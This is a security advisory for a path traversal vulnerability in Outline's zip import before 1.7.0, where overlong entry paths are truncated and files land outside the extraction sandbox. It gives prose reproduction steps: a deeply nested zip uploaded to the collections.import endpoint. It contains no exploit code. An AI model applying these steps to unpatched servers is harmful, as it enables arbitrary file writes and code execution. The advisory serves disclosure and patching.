Outline Zip Extraction Path Escape Vulnerability in Collection Import

A path traversal vulnerability has been identified in Outline versions prior to 1.7.0, specifically within the ZipHelper.extract function. The issue arises when the extraction path for zip entries exceeds the maximum path length of 4096 bytes. In such cases, the filename helper function trimFileAndExt truncates the path, removing all directory components and leaving only the filename. This truncated filename is then used to create a write stream relative to the process's working directory, instead of within the designated extraction sandbox. As a result, the extracted file persists after the import process, since the cleanup function only removes temporary files, leaving the escaped file in the working directory.

Impact

Exploitation of this vulnerability allows an attacker with team admin privileges to write arbitrary files to the server's working directory. This could lead to overwriting critical application files, such as configuration or source files, causing service disruptions. Additionally, the vulnerability could be exploited to execute injected code on the next service restart, providing persistent access.

Reproduction

To reproduce this vulnerability, create a zip file with a deeply nested directory structure that pushes the total path length over 4096 bytes. Upload this zip file using the collections.import API endpoint. The extraction process will truncate the path, allowing the file to be written to the server's working directory instead of the intended extraction sandbox. After the import, the truncated file will remain in the working directory, demonstrating the successful exploitation of the vulnerability.

Remediation

Users are advised to update to Outline version 1.7.0 or later, where this vulnerability has been fixed.